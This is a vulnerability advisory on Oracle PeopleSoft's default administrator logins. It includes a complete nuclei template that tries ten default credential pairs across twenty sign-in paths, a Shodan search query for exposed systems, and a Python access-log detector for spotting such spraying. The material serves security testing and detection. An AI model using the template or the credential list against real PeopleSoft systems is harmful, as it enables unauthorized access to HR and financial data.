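Vulnerability information
Vulnerability name: Oracle PeopleSoft default login vulnerability
Vulnerability type: Weak password
Severity: High
Description: Oracle PeopleSoft is an enterprise human resources and financial management system. It is widely used by large enterprises and organizations around the world and provides comprehensive business solutions. Many large enterprises favor it for its rich functionality and flexibility.
This vulnerability is a default login credential issue: the system ships with several built-in default administrator accounts and passwords, such as PS/PS and VP1/VP1. Nothing forces these default credentials to be changed after installation, so an attacker can use them to log in to the system with little effort. The technical root cause is that the system's design and deployment do not follow the principle of least privilege and do not require default credentials to be changed, which leaves a security weakness behind.
The security risk is very high. An attacker needs no prior authentication to log in with these default credentials, and can then access sensitive information, modify data, or perform unauthorized operations. Because PeopleSoft systems usually handle core business data, this vulnerability can lead to serious consequences such as data leakage, financial loss, or business interruption. In addition, because exploitation is simple, attackers can use automated tools to scan for and attack affected systems at scale, which increases the risk of exploitation.
Vendor: Oracle
Product: PeopleSoft Enterprise PeopleTools
Affected versions: *
Search syntax: title:"Oracle PeopleSoft Sign-in"
Source: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Foracle%2Fpeoplesoft-default-login.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details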
id: peoplesoft-default-login

info:
  name: Oracle PeopleSoft - Default Login
  author: LogicalHunter
  severity: high
  description: Oracle PeopleSoft contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.oracle.com/applications/peoplesoft/
    - https://erpscan.io/press-center/blog/peoplesoft-default-accounts/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 201
    shodan-query: title:"Oracle PeopleSoft Sign-in"
    product: peoplesoft_enterprise_peopletools
    vendor: oracle
  tags: default-login,peoplesoft,oracle,fuzz

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        words:
          - "PeopleSoft"
          - "Oracle"
        condition: or
        internal: true

  - method: POST
    path:
      - "{{BaseURL}}/psc/ps/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/csperf/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/FMPRD/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/csprd/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/hcmprdfp/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/HRPRODASP/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/guest/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/applyuth/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/HRPRD/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/CAREERS/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/heprod_5/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/saprod/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/hr857prd_er/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/CHUMPRDM/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/HR92PRD/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/cangate_1/?&cmd=login&languageCd=ENG"
      - "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG"

    body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG"

    headers:
      Content-Type: application/x-www-form-urlencoded
    attack: pitchfork
    payloads:
      username:
        - PS
        - VP1
        - PSADMIN
        - PSEM
        - PSHC
        - PSCR
        - HFG
        - PSPY
        - HHR_JPM
        - HHR_CMP
      password:
        - PS
        - VP1
        - PSADMIN
        - PSEM
        - PSHC
        - PSCR
        - HFG
        - PSPY
        - HHR_JPM
        - HHR_CMP
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie: PS_TOKEN='

      - type: status
        status:
          - 302
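The template above sends its sign-in POST to a list of guessed site names under /psp/ and /psc/, so a single client posting cmd=login to many distinct site names within a short time is a usable signal in web access logs. The following detector is an added example, not code from the original page or from the nuclei-templates project; the combined log format, the threshold, the time window and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.20 - - [12/Mar/2024:09:58:10 +0000] "POST /psp/HRPRD/?&cmd=login&languageCd=ENG HTTP/1.1" 302 0 "-" "-"
198.51.100.7 - - [12/Mar/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "-"
198.51.100.7 - - [12/Mar/2024:10:00:02 +0000] "POST /psc/ps/?&cmd=login&languageCd=ENG HTTP/1.1" 404 312 "-" "-"
198.51.100.7 - - [12/Mar/2024:10:00:02 +0000] "POST /psp/csperf/?&cmd=login&languageCd=ENG HTTP/1.1" 404 312 "-" "-"
198.51.100.7 - - [12/Mar/2024:10:00:03 +0000] "POST /psp/FMPRD/?&cmd=login&languageCd=ENG HTTP/1.1" 404 312 "-" "-"
198.51.100.7 - - [12/Mar/2024:10:00:03 +0000] "POST /psp/csprd/?&cmd=login&languageCd=ENG HTTP/1.1" 404 312 "-" "-"
198.51.100.7 - - [12/Mar/2024:10:00:04 +0000] "POST /psp/HRPRD/?&cmd=login&languageCd=ENG HTTP/1.1" 302 0 "-" "-"
203.0.113.20 - - [12/Mar/2024:10:05:44 +0000] "POST /psp/HRPRD/?&cmd=login&languageCd=ENG HTTP/1.1" 302 0 "-" "-"
"""

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Sign-in endpoint shape taken from the template: /psp/<site>/?...cmd=login
LOGIN_RE = re.compile(r'^/ps[pc]/([^/]+)/\?.*cmd=login')

def find_site_sprays(log_text, min_sites=4, window=timedelta(seconds=60)):
    """Return {client_ip: {"sites": [...], "redirects": [...]}} for clients that
    POST cmd=login to at least min_sites distinct site names within window."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        site = LOGIN_RE.match(path)
        if method != "POST" or not site:
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        events[ip].append((when, site.group(1), int(status)))

    findings = {}
    for ip, hits in events.items():
        hits.sort()
        for i, (start, _, _) in enumerate(hits):
            burst = [h for h in hits[i:] if h[0] - start <= window]
            sites = sorted({h[1] for h in burst})
            if len(sites) >= min_sites:
                # 302 is one of the template's two match conditions; follow these up.
                redirects = sorted({h[1] for h in burst if h[2] == 302})
                findings[ip] = {"sites": sites, "redirects": redirects}
                break
    return findings
```

A 302 in the access log is only half of the template's match condition (the other half is the PS_TOKEN cookie), so the listed redirects are sign-ins to verify on the application side, not confirmed compromises.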